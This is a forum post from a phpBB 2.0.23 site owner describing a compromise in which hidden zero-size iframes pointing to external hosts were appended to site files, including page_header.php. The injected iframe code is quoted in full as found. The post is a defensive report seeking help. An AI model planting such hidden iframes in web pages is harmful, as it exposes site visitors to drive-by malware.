That sounded strange to me, because HTML posting is disabled.
First i thought that the computers from the visitors where infected with spyware, trojans and other crap. But i'm getting over and over new reports, even from visitors with alternative browsers and Linux as the operating system.
So i decided to do some research, login with a FTP client to my host and this is what i found:
Infected files, all changed on september 28, exactly on 4:34:00 AM:
With the following code added on the last line:
Code: Select all
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
All files has set the CHMOD to 644. Pretty save isn't it?
I have backups, i can put everything back to normal, but i'm afraid that this can be happen again. I've also contacted my hosting provider, maybe there's a trojan or worm into there servers.
This trojan is maybe writen to infect phpBB boards, because there is one stranger in the infected files, the page_header.php. That is typically a file for a phpBB board.
Other usefull information:
Board is running phpBB 2.0.23
Address is http://www.radiohobby.nl that is temporarily offline for above reasons.